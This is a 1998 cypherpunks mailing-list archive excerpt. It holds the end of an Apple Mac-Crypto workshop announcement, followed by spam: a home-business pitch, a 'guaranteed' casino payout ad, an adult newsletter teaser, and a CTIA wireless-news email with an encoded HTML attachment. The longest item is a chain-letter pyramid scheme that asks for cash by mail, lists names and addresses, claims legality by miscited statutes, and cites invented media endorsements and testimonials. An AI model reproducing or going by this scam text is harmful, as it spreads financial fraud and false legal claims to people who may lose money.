                4 Infinite Loop, Cupertino, CA, USA
                
            Keeping with tradition, this is still free workshop, 
            but we'd *really* like it if you register (see below).
  
We are once again hosting our annual workshop,  where you are sure to 
find the latest and greatest information about whats going on in the 
Macintosh cryptography world. 

A lot has happened in the past year in the world of the Internet 
and Cryptography, so this year, thanks to popular demand we have 
allocated more time and a larger hall for developers to talk about
what they are working on. 

 
PRELIMINARY WORKSHOP TOPICS: (more to come)

  Introductions and Overviews:

    Intro to Crypto Systems 
 
    Export Controls & Crypto software 
    
    Crypto Opportunities for the Mac
    
   Tech Stuff:

     AppleShare Authentication Architecture 
    
     PGPticket - A Secure Authorization Protocol 
    
     The AltaVec PowerPC Architecture
    
     Apple Security Architecture Overview.
    
     Apple Keychain / Subwoofer update
    
     OpenPGP & the IETF standards process 
     
     Overview of Crypto API's and Toolkits
     
 
  Applications of Cryptography

     RC5 cracking effort & the Mac 
    
     PGPUAM - Appleshare Public Key Authentication 
       
     Graphically displaying the Web of Trust 
     
     Anonymous Communications and the Macintosh 
     
     
  Open Sessions:

    As requested we scheduled lots of time for developer demos and
open
    discussions plus the much asked for and a PGP Keysigning party ...
    and plenty of time for developers to network with each other and 
    Apple.

We have also left time open for a few last-minute speakers. If you
would like to present a paper or give a talk, please contact
Vinnie Moscaritolo at vinnie@apple.com 
 
To find out more about previous Mac-Crypto workshops check out 
our webpage at  http://www.vmeng.com/mc/ 

REGISTRATION:

 To register, complete the following form, and email it to 
 mac-crypto-conference@vmeng.com with the subject line REGISTRATION
 
 Registration is limited to 300 attendees, so be sure to register 
 early. 
 
_______________________________________________________________________

* Name:                               

* Email Address:

Title:

Affliation:
 
Address: 

Telephone:

Comments:
 
_______________________________________________________________________


Local Hotels:

Cupertino Inn, 800-222-4828
        Pretty much Across the Street.

Cupertino Courtyard by Marriot, 800-321-2211
        5 Minute Drive

Inn at Saratoga
        408-867-5020
        About 3 Miles

See you in Cupertino on October 6 - 9th!

Vinnie Moscaritolo
Apple World Wide Developer Support
 DSS/DH:   3F903472C3AF622D5D918D9BD8B100090B3EF042

 
 
 

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0

iQA/AwUBNgA9BR16LYZvFyoKEQKYAACfXK7uA40tX1DRy44zTaqkesDs5TkAoKS3
Fx/5lcgO9b6Wqfsibdpc1MRz
=c+ZP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 09644775KG@fiberia.com
Date: Wed, 16 Sep 1998 18:04:21 -0700 (PDT)
To: 48472X27@aol.com
Subject: PLEASE CONSIDER THIS TERRIFIC HOME BUSINESS !
Message-ID: <987883301KV4499.cyclone.net>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#8cf2ad"></P><P ALIGN=CENTER><FONT COLOR="#004040" SIZE=6><B>HOME BASED BUSINESS

THE NEW FRONTIER !

</P><P ALIGN=JUSTIFY><FONT COLOR="#004040" SIZE=3>SOMEONE STARTS A NEW HOME BASED BUSINESS EVERY 11 SECONDS RESULTING IN 8,000 NEW HOME BASED BUSINESSES DAILY ! ! THE GROWTH OF THIS INDUSTRY IS NOTHING SHORT OF A SILENT REVOLUTION, SOON TO REACH $500 BILLION ANNUAL REVENUES.

44% OF ALL HOUSEHOLDS WILL SUPPORT SOME SORT OF HOME BASED BUSINESS BY THE YEAR 2000. </FONT><FONT COLOR="#0000ff" SIZE=3>THE AVEREAGE HOME BASED BUSINESS EARNS $50,250 PER YEAR - - NEARLY DOUBLE THE NATIONAL AVERAGE OF THOSE WORKING FOR SOMEONE ELSE ! !

</FONT><FONT COLOR="#004040" SIZE=3>LET ME TELL YOU A LITTLE ABOUT OUR GREAT OPPORTUNITY IN THE HOME BASED BUSINESS FIELD. OUR PEOPLE TYPICALLY WORK FROM 2 TO 4 HOURS DAILY WITH 23% ELECTING TO DO IT FULL TIME.

1. THEY DO NO SELLING
2. THEY MAKE NO PHONE CALLS
3. THEY DO NOT CARRY INVENTORY
4. THEY MAKE NO PRESENTATIONS
5. THEY DO NO RUNNING AROUND

OUR COMPANY EMPLOYS PROFESSIONAL ONLINE RECRUITERS AND USES NEWSPAPER AND RADIO ADS TO HELP YOU PROMOTE YOUR BUSINESS. </FONT><FONT COLOR="#0000ff" SIZE=3>WE HELP YOU GET YOUR BUSINESS STARTED AND IT COSTS YOU NOTHING - - ALL YOU HAVE TO DO IS JOIN AND BECOME AN ACTIVE MEMBER OF OUR #1 TEAM.</FONT><FONT COLOR="#004040" SIZE=3>

WHAT DO YOU HAVE TO LOSE? CLICK BELOW AND WE WILL TAKE YOU ON A </FONT><FONT COLOR="#ff0000" SIZE=3>TOUR OF OUR COMPANY. </FONT><FONT COLOR="#004040" SIZE=3>WE WILL INTRODUCE YOU TO OUR PRODUCTS, SHOW YOU HOW WE OPERATE OUR BUSINESS, LET YOU CALCULATE YOUR EARNINGS POTENTIAL BASED ON YOUR EXPECTED LEVEL OF PARTICIPATION AND SHOW YOU </FONT><FONT COLOR="#0000ff" SIZE=3>HOW TO ENROLL !</FONT><FONT COLOR="#004040" SIZE=3>

[ Click Here > > > for YOUR Tour and Opportunity.... ]</P><P ALIGN=CENTER><FONT COLOR="#ffff00" SIZE=6><U>

</P><P ALIGN=CENTER></FONT><FONT COLOR="#008080" SIZE=3>Responsible Emailing 100% No Hassle Connection</FONT><FONT COLOR="#800000" SIZE=3>
</P><P ALIGN=LEFT>

</FONT><FONT COLOR="#0000ff" SIZE=2>If you would not like to receive any future mail concerning money making opportunities, please click on the link below and type in the word "Remove" in the subject line of your email. You will be removed from our data base. Sorry for any inconvenience we may have caused you..</FONT><FONT COLOR="#004000" SIZE=3>
[ Type "REMOVE" in the subject line of your email ]<U>


</P><P ALIGN=LEFT>
</P><P ALIGN=CENTER>
</B></PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: playandwin@casino.com
Date: Wed, 16 Sep 1998 17:34:46 -0700 (PDT)
Subject: FREE CASINO DOLLARS!!!
Message-ID: <199809170006.UAA25323@mail.scanlanhs.edu>
MIME-Version: 1.0
Content-Type: text/plain


The time has come to enjoy casino games from the comfort of your home. Find
out where to play ALL of your favorite casino games online securely.
Blackjack! Craps! Slot Machines! Roulette! Baccarat! & Much, Much More! The
Best Odds! Huge Pay-Outs! Top-Rated Customer Service, GUARANTEED! 

For more information, reply below IMMEDIATELY and you will be GUARANTEED TO
RECEIVE between $25 and $10,000 INSTANTLY! You need to reply today for more
info and GUARANTEED acceptance. You must respond NOW at
onlinefun@bigfoot.com and type "Show Me The Money" in the Subject.

It's simple! All you have to do is reply to this e-mail and you will be
GUARANTEED TO RECEIVE between $25 and $10,000. Just CLICK HERE
onlinefun@bigfoot.com and put "Show Me The Money" in the Subject of the
e-mail message. Remember, you will be GUARANTEED TO RECEIVE between $25
and $10,000!  DON'T DELAY. REPLY NOW! 

Should you choose to be removed from this list and future mailings,
reply to this e-mail with "REMOVE" in the Subject of the message. 

To learn more about e-mail advertising please call (416)410-2938






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bset4life@bigfoot.com
Date: Wed, 16 Sep 1998 09:55:56 -0700 (PDT)
To: bset4life@bigfoot.com
Subject: BEST THING GOING
Message-ID: <199809161642.BAA10040@nlpeng.sogang.ac.kr>
MIME-Version: 1.0
Content-Type: text/plain




THIS IS NOT SPAM! You are on our mailing list because you have subscribed at one of our associate web sites,sent us email or we have a previous online relationship.
To be removed from future mailings mailto:database9898@hotmail.com 
 
                                 This is it folks.

             This is the letter you've been reading about in the news lately
 
   Due to the popularity of this letter on the Internet, a major nightly news program recently devoted an entire show to the investigation of the program described below , to see if it really can make people money.  If you saw it, you know that their conclusion was ,that while most people did not make the $55,000, as discussed in the plan, EVERYONE who followed the instructions was able to make 100 to 160 times their money at the VERY LEAST . The show also investigated whether or not the program was legal.  Their findings proved once and for all that there are absolutely no laws prohibiting the participation in the program.

This is one of the most exciting opportunities with the MOST income potential on the internet today!" --48 Hours..
Hi, my name is Fred. After I saw this letter aired on the news program,I decided to get some of my skeptical questions answered.
Does it really work? Until I try it, I can only go on the testimony of people I don't know,so I will only know if I try it. I've never done this type of thing, but I decided
it was time to try something. If I keep doing what I am doing I'll keep getting what I've got.  Besides, people 70 years old have been surveyed and they will consistently say
that the 2 regrets they have of there lives are;
they wish they had spent more time with their families and
 
they wish they had taken more chances.

Upon hearing this again,and hearing what the MEDIA said about it, I decided that at 34, I was going to take a small chance and see what would come of it.
Is it legal? - Yes, (Refer to title 18, Section 1302 & 1342 of the U.S. Postal and Lottery Laws)
 
This opportunity isn't much of a risk and could turn out to actually be a bit of fun.

Bottom Line;

The risk is only $20 and time on the Internet.

The following is a copy of the letter that the media was referring to:
 
MONEY-MAKING PHENOMENON.
 
PRINT this letter, READ the directions, THEN READ IT AGAIN !!!

You are about to embark on the most profitable and unique program you may ever see.  Many times over, it has demonstrated and proven its ability to generate large amounts of   This program is showing fantastic appeal with a huge and ever-growing on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity.  It does not require you 
to come in personal contact with people, do any hard work, and best of all,    you never have to leave the house, except to get the mail and go to the bank!
 
This truly is that lucky break you've been waiting for!  Simply follow the easy instructions in this letter, and your financial dreams can come true!  When followed correctly, this electronic, multi-level marketing program WORKS!


Thousands of people have used this program to:        
 
      -  Raise capital to start their own business
 
      -  Pay off debts

      -  Buy homes, cars, etc.,

      -  Even retire!

This is your chance, Don't pass it up!
 
 
----------------------------------------------------------------------------------

OVERVIEW OF THIS EXTRAORDINARY
 
ELECTRONIC MULTI-LEVEL MARKETING PROGRAM

----------------------------------------------------------------------------------

Basically, this is what we do:

We send thousands of people a product that they paid us $5.00 US for, that costs next to nothing to produce and e-mail back to them. As with all multi-level businesses, we build our business by recruiting new partners and selling our products.  Every state in the U.S. allows you to recruit new multi- level business online 
(via your computer).
 
The products in this program are a series of four business and financial reports costing $5.00 each.  Each order you receive is to include:



  $5.00 cash United States Currency
 
 * The name and number of the report they are ordering

 * The e-mail address where you will e-mail them the report they ordered.


 
To fill each order, you simply e-mail the product to the buyer. 
THAT'S IT!  The $5.00 is yours! 
This is the electronic multi-level marketing business anywhere!
 
FOLLOW THE INSTRUCTIONS TO THE LETTER AND

BE PREPARED TO REAP THE STAGGERING BENEFITS!

I  N  S  T  R  U  C  T  I  O  N  S 
This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if you don't order them).

     *  For each report, send $5.00 CASH, the NAME & NUMBER OF THE

       REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR

      RETURN POSTAL ADDRESS (in case of a problem) to the person whose

         name appears on the list next to the report.
 
     *  When you place your order, make sure you order each of the four
 
         reports.  You will need all four reports so that you can save them

         on your computer and resell them.

     *  Within a few days you are to receive, via e-mail, each of the four reports.

         Save them on your computer so they will be accessible for you to send

          to the 1,000's of people who will order them from you.
 

 
2. IMPORTANT-- DO NOT alter the names of the people who are listed next  to

each report, or their sequence on the list, in any way other than is  instructed
 
below in steps "a" through "d" or you will lose out on the majority of your profits.    

Once you  understand the way this works, you'll also see how it doesn't work if you change it. 

Remember, this method  has been tested,
 
and if you alter it, it will not work.
 
a.  Look below for the listing of available reports.


b. After you've ordered the four reports, replace the name and address under
 
REPORT #1 with your name and address, moving the one that was there

down to REPORT #2.

c.Move the name and address that was under REPORT #2 down to .
 
REPORT #3


d. Move the name and address that was under REPORT #3 down to

REPORT#4
 
e.  The name and address that was under REPORT #4 is removed from
 
the list and has NO DOUBT collected large sums of cash!
 
Please make sure you copy everyone's name and address ACCURATELY!!!
 
 
3.  Take this entire letter, including the modified list of names, and save  it to

your computer.  Make NO changes to the instruction portion of this  letter.
 
4.  Now you're ready to start an advertising campaign on the
 
WORLDWIDE WEB!  Advertising on the WEB can be very, very inexpensive,

and there are HUNDREDS of FREE places to advertise. Another avenue which

you could use for advertising is e-mail lists. You can buy these lists for under

$20/2,000 addresses or you can pay someone to take care of it for you.
 
BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!
 
5.  For every $5.00 you receive, all you must do is e-mail them the report

they ordered.  THAT'S IT!  ALWAYS PROVIDE SAME-DAY SERVICE ON ALL

ORDERS! This will help guarantee that the e-mail THEY send out, with YOUR

name and address on it, will be prompt because they can't  advertise until

they receive the report!  To grow fast be prompt and courteous.

--------------------------------------   
 
AVAILABLE REPORTS
 
---------------------------------------

Order Each REPORT by NUMBER and NAME

Notes:
 
 -  ALWAYS SEND $5 CASH FOR EACH REPORT
 
 -  ALWAYS SEND YOUR ORDER VIA THE QUICKEST DELIVERY
 
 -  Make sure the cash is concealed by wrapping it in at least two sheets of paper

 -  On one of those sheets of paper, include: (a) the number & name of the report you are ordering, (b) your     
    e-mail address, and (c) your postal address.
 
_________________________________________________________________
 
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 
 
ORDER REPORT #1 FROM:
 
Pete Chiros
PO Box 1262
Bakersfield,  Ca   93302
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:
 
JR Reevs
PO Box    78152
Greenfield, Ca   93383-8152
______________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
 
Claude Taylor
2323 Morro Road.
Fallbrook Ca.  92028
 
_______________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:

B.S.G.
PO Box 9864
Bakersfield, Ca.  93389
 
________________________________________________________________
 

HERE'S HOW THIS AMAZING PLAN WILL MAKE YOU $MONEY$

--------------------------------------------------------------------------------------------------
Let's say you decide to start small just to see how well it works. Assume your goal is to get 10 people to participate on your first level.  (Placing a lot of FREE ads on the internet will EASILY get a larger response.)  Also assume that everyone else in YOUR ORGANIZATION gets ONLY 10 downline members.  Follow this example to achieve the STAGGERING results below.

1st level--your 10 members with $5...........................................$50
 
2nd level--10 members from those 10 ($5 x 100)..................$500

3rd level--10 members from those 100 ($5 x 1,000)..........$5,000
 
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
 
                                                THIS TOTALS        ----------->$55,550 

 Remember friends, this assumes that the people who participate only recruit 10 people each.  Think for a  moment what would happen if they got 20 people to participate!  Lots of people get 100s of participants!

 THINK ABOUT IT!

 Your cost to participate in this is practically nothing (surely you can afford $20).  You obviously already have an internet connection and e-mail is FREE!!!  shows you the most productive methods for bulk e-mailing and purchasing e-mail lists.  Some list & bulk e-mail vendors even work on trade!

About 50,000 new people get online every month

 
 
TIPS FOR SUCCESS
 
*  TREAT THIS AS YOUR BUSINESS!  Be prompt, professional, and follow the directions accurately.

*  Send for the four reports IMMEDIATELY so you will have them when

the orders start coming in because:
 
When you receive a $5 order, you MUST send out the requested   product/report to comply

  with the U.S. Postal & Lottery Laws, Title  18,Sections 1302 and 1341 or Title 18,  Section 3005
 
 in the U.S. Code   also Code of Federal Regs. vol. 16, Sections 255 and 436, which state
 
 that "a product or service must be exchanged for money received."


 
*ALWAYS PROVIDE SAME-DAY SERVICE ON THE ORDERS YOU RECEIVE.        

 

*Be patient and persistent with this program. If you follow the

instructions exactly, the results WILL undoubtedly be SUCCESSFUL!


*  ABOVE ALL, HAVE FAITH IN YOURSELF AND KNOW YOU WILL SUCCEED!
 
 
YOUR SUCCESS GUIDELINE

Follow these guidelines to help assure your success:
 
 If you don't receive 10 to 20 orders for REPORT #1 within two weeks, continue advertising until you do.  Then, a couple of weeks later you should receive at least 50 orders for REPORT #2.  If you don't, continue advertising until you do.  Once you have received 50 or more orders for REPORT #2, YOU CAN RELAX, because the system is already working for you, and the cash can continue to roll in!
 
 
THIS IS IMPORTANT TO REMEMBER:
 

 Every time your name is moved down on the list, you are placed in front of a DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching which report people are ordering from you.  If you want to generate more income, send another batch of e-mails and start the whole process again!  There is no limit to the income you will generate from this business!

NOTE:  If you need help with starting a business, registering a business name,  how income tax is handled, etc., contact your local office of the Small Business Administration (a Federal agency) for free help and answers to questions.  Also, the Internal Revenue Service offers free help via telephone and free seminars about business taxes.   If you have any question of the legality of this letter contact the Office of Associate Director for Marketing Pratices Federal Trade Commission Bureau of Consumer Protection in Washington DC.

 
T  E  S  T  I  M  O  N  I  A  L  S

      This program does work, but you must follow it EXACTLY!  Especially the rule of not trying to place your name in a different position, it won't work and you'll lose a lot of potential income.  I'm living proof that it works.  It really is a great opportunity to make relatively easy money, with little cost to you.  If you do choose to participate, follow the program exactly, and you'll be on your way to financial security.

Sean McLaughlin, Jackson, MS
 
 

     The main reason for this letter is to convince you that this system is honest, lawful, extremely profitable, and is a way to get a large amount of money in a short time.  I was approached several times before I checked this out.  I joined just to see what one could expect in return for the minimal effort and money required.  To my astonishment, I received $36,470.00 in the first 19 weeks, with money still coming in.

            Sincerely yours, Phillip A. Brown, Esq.
 
 

     I had received this program before. I deleted it, but later I wondered if I shouldn't have given it a try. Of course, I had no idea who to contact to get another copy, so I had to wait until I was e-mailed another program...11 months passed then it came...I didn'tdelete this one!...I made more than $41,000 on the first try!!

           D. Wilburn, Muncie, IN
 


      This is my third time to participate in this plan. We have quit our jobs, and will soon buy a home on the beach and live off the interest on our money.  The only way on earth that this plan will work for you is if you do it. For your sake, and for your family's sake don't pass up this golden opportunity.  Good luck and happy spending!
 
            Charles Fairchild, Spokane, WA
 
I am nearing the $90,000 mark from this program.I have used several forms of

  advertisement.I used regular mail and bulk e-mail.  The regular mail that I used
  
  was very expensive for two reasons. I purchased a very select list of names
 
  and the postage. The third time I sent e-mails out,I did so in the quantity of
 
  1 million. So, after 3 times participating in this program I am almost at the
 
  $90,000 mark. That isn't too bad. I hope the same success for you. .
 
  Good Luck.
 
     Raymond McCormick, New Cannan, Ct. 
 
You have great potential for extra earnings that is available at your finger-tips!  

You have unlimited access to wealth, but you must be willing to take that first step!   

The Media ALREADY PROVED That !!!!
                      
You could be making an obscene amount of money!

 I have given you the information, materials, and opportunity to become
 
 financially better off. IT IS UP TO YOU NOW!- THINK ABOUT IT - Your risk is

 only $20.? HOW MUCH DO YOU SPEND ON LOTTO TICKETS- for NO RETURN?
 
 ORDER YOUR REPORTS TODAY AND GET

 STARTED ON YOUR ROAD TO
 
 FINANCIAL FREEDOM!!!
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Thu, 17 Sep 1998 01:46:24 -0700 (PDT)
To: (STUFFED THURSDAY SEPTEMBER 17 1998)
Subject: CLINTON SPECIAL ISSUE: The Oval Orifice/Clinton Sex Therapy/Multi-taskwinsky
Message-ID: <19980917071001.17270.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


We're having an  impeachy time digging up the dirt and
bringing you  all the latest  stories from  Bubbagate!
And in case you missed our erection coverage yesterday
don't forget to check it out after you've read today's
issue. GIVE THAT MAN A CIGAR!

IN TODAY'S ISSUE:

 30 NEW EXTRA HOT JPEGS!
  5 NEW SIZZLING STORIES
   NIPPLED SALES
    MULTI-TASKWINSKY
     HOW TO KISS YOUR BABE GOOD-BYE
      THE BEST OF EUREKA!
       MASO-CASTING CALL
        CLINTON SEX THERAPY
         NICOLE KIDMAN'S TITS
          GRANNY PORN
           THE OVAL ORIFICE
            MUCH MORE!
       ---->   http://stuffed.net/98/9/17/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/17/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 17 Sep 1998 09:35:21 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 17, 1998
Message-ID: <199809171629.LAA22564@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3996.1071713805.multipart/mixed"

--Boundary..3996.1071713805.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit





==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

The Newest Most Comprehensive Tradeshow of Wireless 
Computing and Communications is Only a Month Away. 
Register TODAY!
http://www.wirelessit.com/register.htm 

Team WOW-COM
wowcom@ctia.org
===========================================
 





--Boundary..3996.1071713805.multipart/mixed
Content-Type: application/octet-stream; name="bin00020.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00020.bin"
Content-Description: "CTIA_Daily_News_19980917.htm"

PEhUTUw+CjxIRUFEPgogICA8TUVUQSBIVFRQLUVRVUlWPSJDb250ZW50LVR5
cGUiIENPTlRFTlQ9InRleHQvaHRtbDsgY2hhcnNldD1pc28tODg1OS0xIj4K
ICAgPE1FVEEgTkFNRT0iQXV0aG9yIiBDT05URU5UPSJDVElBIEVkaXRvcmlh
bCBTdGFmZiI+CiAgIDxNRVRBIE5BTUU9IkdFTkVSQVRPUiIgQ09OVEVOVD0i
TW96aWxsYS80LjAyIFtlbl0gKFdpbjk1OyBJKSBbTmV0c2NhcGVdIj4KICAg
PFRJVExFPl9DVElBIERhaWx5IE5ld3MgRnJvbSBXT1ctQ09NXzwvVElUTEU+
CjwvSEVBRD4KPEJPRFk+CiZuYnNwOwo8QlI+Jm5ic3A7CjxDRU5URVI+PFRB
QkxFIEJPUkRFUj0wIENPTFM9MiBXSURUSD0iNjAwIiA+CjxUUj4KPFREPjxB
IEhSRUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPjxJTUcgU1JDPSJodHRw
Oi8vd3d3Lndvdy1jb20uY29tL2ltYWdlcy9ob21laGVkX3Rlc3QuZ2lmIiBB
TFQ9IldPVy1DT00uQ09NIiBOT1NBVkUgQk9SREVSPTAgSEVJR0hUPTg5IFdJ
RFRIPTI3NT48L0E+PC9URD4KCjxURD4KPENFTlRFUj48QSBIUkVGPSJodHRw
Oi8vd3d3LmlsbHVtaW5ldFNTNy5jb20vd2lyZWxlc3Mvd2ludW1wb3IuaHRt
Ij48SU1HIFNSQz0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9pbWFnZXMvYWRz
L2lsbHVtaW5ldF9udW1wb3J0LmdpZiIgQUxUPSJUb2RheSdzIE5ld3MgU3Bv
bnNvcmVkIGJ5IElsbHVtaW5ldCIgTk9TQVZFIEJPUkRFUj0wIEhFSUdIVD03
NSBXSURUSD0xNzUgQUxJR049QUJTQk9UVE9NPjwvQT48L0NFTlRFUj4KPC9U
RD4KPC9UUj4KPC9UQUJMRT48L0NFTlRFUj4KCjxDRU5URVI+Jm5ic3A7PC9D
RU5URVI+Cgo8Q0VOVEVSPjxUQUJMRSBCT1JERVI9MCBXSURUSD0iNjAwIiA+
CjxUUiBCR0NPTE9SPSIjMDAwMDk5Ij4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBDT0xPUj0iI0NDQ0ND
QyI+PEZPTlQgU0laRT0rMT5DVElBCkRhaWx5IE5ld3MgZnJvbSBXT1ctQ09N
IC0gU2VwdGVtYmVyIDE3LCAxOTk4PC9GT05UPjwvRk9OVD48L0ZPTlQ+PC9C
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
CjxIUiBXSURUSD0iNTgwIj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+
CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGlj
YSI+PEZPTlQgU0laRT0rMT5XaXJlbGVzcyBQcmVmZXJyZWQgT3ZlcgpXaXJl
bGluZTwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0
aWNhIj5Nb3JlIGFuZCBtb3JlIHRlbGVwaG9uZSBjdXN0b21lcnMgYXJlCiJj
dXR0aW5nIHRoZSBjb3JkIiBvZiB0aGVpciBsYW5kbGluZSBwaG9uZXMgdG8g
dXNlIHRoZWlyIHdpcmVsZXNzIHBob25lcwpleGNsdXNpdmVseS4gKDxBIEhS
RUY9Imh0dHA6Ly93d3cubnl0aW1lcy5jb20vbGlicmFyeS90ZWNoLzk4LzA5
L2NpcmN1aXRzL2FydGljbGVzLzE3Y2VsbC5odG1sIj5OWVRJTUVTPC9BPik8
L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4K
CjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05U
IFNJWkU9KzE+SXJpZGl1bSdzIE5ldyAkMzAwMCBXaXJlbGVzcwpQaG9uZSBF
eHBlY3RlZCBpbiBOb3ZlbWJlcjwvRk9OVD48L0ZPTlQ+PC9CPjwvVEQ+Cgo8
VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj5JcmlkaXVtJ3MgbmV3IHNhdGVsbGl0ZSBw
aG9uZSB3aWxsIGFsbG93CnVzZXJzIHRvIGNhbGwgYW55d2hlcmUgaW4gdGhl
IHdvcmxkLiZuYnNwOyBJdCB3aWxsIGJlIHRoZSBmaXJzdCB3aXJlbGVzcwpw
aG9uZSBvZiBpdHMga2luZC4gKDxBIEhSRUY9Imh0dHA6Ly93d3cudXNhdG9k
YXkuY29tL21vbmV5L2Jjb3Z0aHUuaHRtIj5VU0FUT0RBWTwvQT4pPC9GT05U
PjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+
PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpF
PSsxPkZDQyBQbGFucyBUbyBNYWtlIFBob25lCkJpbGxzIEVhc2llciB0byBS
ZWFkPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoK
PFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPkZlZGVyYWwgcmVndWxhdG9ycyBhcmUgd29ya2luZyB0b2RheSB0bwph
c3Npc3QgaW4gc2ltcGxpZnlpbmcgcGhvbmUgYmlsbHMgZm9yIHRoZSBiZW5l
Zml0IG9mIGNvbnN1bWVycy4gKDxBIEhSRUY9Imh0dHA6Ly93d3cudXNhdG9k
YXkuY29tL21vbmV5L2RpZ2VzdC9tZDEuaHRtI3Bob25lIj5VU0FUT0RBWTwv
QT4pCig8QSBIUkVGPSJodHRwOi8vY25uZm4ubmV3cy1yZWFsLmNvbS8iPkNO
TkZOPC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRp
Y2EiPjxGT05UIFNJWkU9KzE+SlZDJ3MgUG9ja2V0TWFpbCBTZXQKVG8gRW50
ZXIgVGhlIE1hcmtldCBJbiBOb3ZlbWJlcjwvRk9OVD48L0ZPTlQ+PC9CPjwv
VEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEZP
TlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj5Qb2NrZXRNYWlsIGlzIGEgZGV2
aWNlIHRoYXQgYWxsb3dzIHVzZXJzCnRvIGNoZWNrIGUtbWFpbCBhbmQgc2Vu
ZCBmYXhlcyB0aHJvdWdoIG1vc3QgY2VsbHVsYXIgYW5kIGRpZ2l0YWwgcGhv
bmVzLgooPEEgSFJFRj0iaHR0cDovL3d3dy50ZWNod2ViLmNvbS93aXJlL3N0
b3J5L1RXQjE5OTgwOTE2UzAwMTUiPlRFQ0hXRUI8L0E+KTwvRk9OVD48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxC
PjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5T
ZW5hdGUgV29ya2luZyBUbyBFYXNlClkySyBMZWdhbCBJc3N1ZXM8L0ZPTlQ+
PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48
L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+U2VuYXRl
IEp1ZGljaWFyeSBDb21taXR0ZWUgYmVnYW4gZWZmb3J0cwp0byBwYXNzIGxl
